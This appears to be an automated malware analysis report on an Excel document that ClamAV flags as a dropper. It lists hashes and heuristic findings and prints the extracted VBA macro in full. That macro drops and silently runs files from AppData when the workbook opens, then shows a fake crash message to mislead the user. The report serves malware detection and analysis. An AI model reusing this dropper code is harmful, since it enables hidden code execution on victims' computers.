Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f0c85a1c9cf80ad4…

MALICIOUS

Office (OLE)

794.5 KB Created: 2018-08-28 10:39:29 Authoring application: Microsoft Excel First seen: 2022-07-02
MD5: a6270064f1630cdf5bcda858762db516 SHA-1: 514862e015a43b914971ad9ece05a3ea0939c6fd SHA-256: f0c85a1c9cf80ad424acebbe7af54176d0cb778a639da2f2f59828af5bb79842
196 Risk Score

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6892861-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6892861-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Call Shell(strProgramName, vbHide)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        path_file = Environ$("USERPROFILE") & Split("\AppData\!juchek", "!")(0) + Split("juchek!" & path_dom, "!")(1) + Split("juchek!.ttp", "!")(1)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3397 bytes
SHA-256: 75023a5832f9c439b782b43bb4f97d1d5c318ce488927e6353bb74c99070b174
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub WaitFo(NumOfSeconds As Long)
    Dim SngSec As Long
    Dim path_dom As String
    path_dom = "F1DF22D4B52R2dD2C1"
    SngSec = Timer + NumOfSeconds
    Do While Timer < SngSec
        DoEvents
    Loop
    path_dom = "E1F122WF42B213D1C"
End Sub

Sub userLoadr()
    Dim row As Long
    Dim path_file As String
    Dim path_dom As String
    path_dom = "juchek"
    path_file = Environ$("USERPROFILE") & Split("\AppData\!juchek", "!")(0) + Split("juchek!" & path_dom, "!")(1) + Split("juchek!.ttp", "!")(1)
    Dim ar() As String
    If Len(Dir(path_file)) = 0 Then
        ar = Split(UserForm.TextBox1.Text, ",")
        Open path_file For Binary As #1
        Seek #1, LOF(1) + 1
        For row = LBound(ar) To UBound(ar)
            Put #1, , CByte(ar(row))
          
      Next
        Close #1
        Call WaitFo(1)
        End If
        
    path_dom = "bat"
    path_file = Environ$("USERPROFILE") & Split("\AppData\!bat", "!")(0) + Split("bat!" & path_dom, "!")(1) + Split("bat!.bat", "!")(1)
    Dim ara() As String
    If Len(Dir(path_file)) = 0 Then
        ara = Split(UserForm1.TextBox1.Text, ",")
        Open path_file For Binary As #1
        Seek #1, LOF(1) + 1
        For row = LBound(ara) To UBound(ara)
            Put #1, , CByte(ara(row))
          
      Next
        Close #1
        Call WaitFo(1)
    End If
    userexecute path_file
End Sub


Sub userexecute(strProgramName As String)
    Call Shell(strProgramName, vbHide)
End Sub




Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
    Call userLoadr
    Sheet2.Copy
    a = MsgBox("Microsoft Excel has stopped working", vbCritical, "Microsoft Excel")
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm"
Attribute VB_Base = "0{17C01D7F-52FF-4A39-B685-4669A7549A70}{E1761CE6-0607-427E-B23A-1752645D7BE9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()

End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{9A378476-F31A-4EA5-92B7-9C5A1B52D65B}{C35F3BB4-0ABF-43DC-A520-0D31BBFA44C3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub TextBox1_Change()

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.